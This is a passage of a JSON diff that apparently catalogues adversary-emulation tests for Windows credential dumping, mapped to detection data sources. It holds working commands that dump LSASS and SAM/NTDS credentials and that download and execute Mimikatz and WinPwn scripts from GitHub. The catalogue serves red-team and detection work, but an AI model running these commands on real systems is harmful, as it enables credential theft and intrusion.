"Path to xordump", + "type": "Path", + "default": "C:\\Windows\\Temp\\xordump.exe" + }, + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp" + } + }, + "dependencies": [ + { + "description": "Computer must have xordump.exe\n", + "prereq_command": "if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe\" -OutFile #{xordump_exe}\n" + } + ], + "executor": { + "command": "#{xordump_exe} -out #{output_file} -x 0x41\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "0ef4cc7b-611c-4237-b20b-db36b6906554", + "name": "Leverage Procdump for lsass memory", + "description": "Dump lsass for later use with mimikatz", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "platforms": { + "windows": { + "psh": { + "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n" + } + } + } + }, + { + "id": "7049e3ec-b822-4fdf-a4ac-18190f9b66d1", + "name": "Powerkatz (Staged)", + "description": "Use Invoke-Mimikatz", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + "parsers": { + "plugins.stockpile.app.parsers.katz": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + }, + { + "source": "domain.user.name", + "edge": "has_hash", + "target": "domain.user.ntlm" + }, + { + "source": "domain.user.name", + "edge": "has_hash", + "target": "domain.user.sha1" + } + ] + }, + "payloads": [ + "invoke-mimi.ps1" + ] + } + } + } + }, + { + "id": "baac2c6d-4652-4b7e-ab0a-f1bf246edd12", + "name": "Run PowerKatz", + "description": "Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "platforms": { + "windows": { + "psh": { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n", + "parsers": { + "plugins.stockpile.app.parsers.katz": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + } + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.002", + "command_list": [ + "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "pypykatz live registry\n", + "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d #{copy_dest}/#{file_name}\n", + "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/SAM\n", + "esentutl.exe /y /vss #{file_path} /d %temp%/#{file_name}\n", + "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath $ENV:temp\\#{dumped_hive} 2\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\myhive 2\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = $ENV:temp + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + 'myhive'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive " + ], + "commands": [ + { + "command": "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "pypykatz live registry\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d #{copy_dest}/#{file_name}\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/SAM\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss #{file_path} /d %temp%/#{file_name}\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath $ENV:temp\\#{dumped_hive} 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\myhive 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = $ENV:temp + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + 'myhive'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive ", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.002", + "display_name": "OS Credential Dumping: Security Account Manager", + "atomic_tests": [ + { + "name": "Registry dump of SAM, creds, and secrets", + "auto_generated_guid": "5c2571d0-1572-416d-9676-812e64ca9f44", + "description": "Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated\nvia three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7\n\nUpon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "cleanup_command": "del %temp%\\sam >nul 2> nul\ndel %temp%\\system >nul 2> nul\ndel %temp%\\security >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Registry parse with pypykatz", + "auto_generated_guid": "a96872b2-cbf3-46cf-8eb4-27e8c0e85263", + "description": "Parses registry hives to obtain stored credentials\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "pypykatz must be installed and part of PATH\n", + "prereq_command": "pypykatz -h >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "pip install pypykatz\n" + } + ], + "executor": { + "command": "pypykatz live registry\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "esentutl.exe SAM copy", + "auto_generated_guid": "a90c2f4d-6726-444e-99d2-a00cd7c20480", + "description": "Copy the SAM hive using the esentutl.exe utility\nThis can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the file to copy", + "type": "Path", + "default": "%SystemRoot%/system32/config/SAM" + }, + "file_name": { + "description": "Name of the copied file", + "type": "String", + "default": "SAM" + }, + "copy_dest": { + "description": "Destination of the copied file", + "type": "String", + "default": "%temp%" + } + }, + "executor": { + "command": "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}\n", + "name": "command_prompt", + "elevation_required": true, + "cleanup_command": "del #{copy_dest}\\#{file_name} >nul 2>&1\n" + } + }, + { + "name": "PowerDump Hashes and Usernames from Registry", + "auto_generated_guid": "804f28fc-68fc-40da-b5a2-e9d0bce5c193", + "description": "Executes a hashdump by reading the hashes from the registry.", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "PowerDump script must exist on disk at specified location", + "prereq_command": "if (Test-Path \"$Env:Temp\\PowerDump.ps1\") {exit 0} else {exit 1} ", + "get_prereq_command": "Invoke-Webrequest -Uri \"https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\" -UseBasicParsing -OutFile \"$Env:Temp\\PowerDump.ps1\"" + } + ], + "executor": { + "command": "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "dump volume shadow copy hives with certutil", + "auto_generated_guid": "eeb9751a-d598-42d3-b11c-c122d9c3f6c7", + "description": "Dump hives from volume shadow copies with the certutil utility\nThis can be done with a non-admin user account\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dump_path": { + "description": "Path where the hive will be dumped", + "type": "Path", + "default": "$ENV:temp" + }, + "target_hive": { + "description": "Hive you wish to dump", + "type": "String", + "default": "SAM" + }, + "dumped_hive": { + "description": "Name of the dumped hive", + "type": "String", + "default": "myhive" + } + }, + "executor": { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + "name": "powershell", + "elevation_required": false, + "cleanup_command": "$toremove = #{dump_path} + \"\\\" + '#{dumped_hive}'\nrm $toremove -ErrorAction Ignore\n" + } + }, + { + "name": "dump volume shadow copy hives with System.IO.File", + "auto_generated_guid": "9d77fed7-05f8-476e-a81b-8ff0472c64d0", + "description": "Dump hives from volume shadow copies with System.IO.File\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dump_path": { + "description": "Path where the hive will be dumped", + "type": "Path", + "default": "$ENV:temp" + }, + "target_hive": { + "description": "Hive you wish to dump", + "type": "String", + "default": "SAM" + }, + "dumped_hive": { + "description": "Name of the dumped hive", + "type": "String", + "default": "myhive" + } + }, + "executor": { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "name": "powershell", + "elevation_required": false, + "cleanup_command": "$toremove = #{dump_path} + \"\\\" + '#{dumped_hive}'\nrm $toremove -ErrorAction Ignore\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes", + "auto_generated_guid": "0c0f5f06-166a-4f4d-bb4a-719df9a01dbb", + "description": "Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1003.003", + "command_list": [ + "vssadmin.exe create shadow /for=C:\n", + "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM_HIVE\n", + "mkdir C:\\Windows\\Temp\\ntds_T1003\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\ntds_T1003\" q q\n", + "wmic shadowcopy call create Volume=C:\\\n", + "wmic /node:\"#{target_host}\" shadowcopy call create Volume=C:\\\n", + "wmic /node:\"localhost\" shadowcopy call create Volume=#{drive_letter}\n", + "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d #{target_path}\"\n", + "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d c:\\ntds.dit\"\n", + "wmic /node:\"localhost\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "(gwmi -list win32_shadowcopy).Create('C:\\','ClientAccessible')\n", + "vssadmin.exe create shadow /for=C:\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D C:\\Temp\\vssstore \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n" + ], + "commands": [ + { + "command": "vssadmin.exe create shadow /for=C:\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM_HIVE\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "mkdir C:\\Windows\\Temp\\ntds_T1003\nntdsutil \"ac i ntds\" \"ifm\" \"create full 